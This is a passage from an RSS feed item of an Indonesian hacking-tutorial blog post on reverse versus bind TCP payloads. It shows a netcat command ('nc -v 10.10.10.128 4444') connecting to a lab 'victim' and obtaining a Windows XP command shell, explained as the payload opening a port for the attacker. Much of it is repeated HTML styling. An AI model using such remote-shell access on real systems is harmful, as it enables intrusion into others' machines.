margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;root@revolution:~# nc -v 10.10.10.128 4444&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Maka ini yang akan terjadi:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command:&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;root@revolution:~# nc -v 10.10.10.128 4444&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;10.10.10.128: inverse host lookup failed: Unknown server error : Connection timed out&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="color: green;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;(UNKNOWN) [10.10.10.128] 4444 (?) open&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;Microsoft Windows XP [Version 5.1.2600]&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;(C) Copyright 1985-2001 Microsoft Corp.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span class="Apple-style-span" style="line-height: 18px;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;C:\Documents and Settings\User\Desktop&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-0CvVcDzCx0w/Txak7kxjraI/AAAAAAAABKI/ZHZpOffuKWc/s1600/nc+bind.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://4.bp.blogspot.com/-0CvVcDzCx0w/Txak7kxjraI/AAAAAAAABKI/ZHZpOffuKWc/s320/nc+bind.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Keterangan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[*] Kali ini saya akan menghubungi IP address victim [10.10.10.128]&lt;/div&gt;&lt;div&gt;[*] Saya akan mencoba port 4444 untuk akses masuk&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;FAQ [Frequently Asked Question]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;[Q] Apa yang terjadi?&lt;/div&gt;&lt;div&gt;[A] Payload kita telah membuat victim membuka port 4444 agar attacker dapat masuk ke system korban&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Created by: &lt;span class="Apple-style-span" style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-1375648537845213473?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/01/perbedaan-reverse-tcp-dan-bind-tcp.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-B1lu-0OPF0c/Txaju7q94pI/AAAAAAAABJg/GdBmlhyd5n0/s72-c/payload+reverse.jpg' height='72' width='72'/><thr:total>1</thr:total></item></channel></rss>
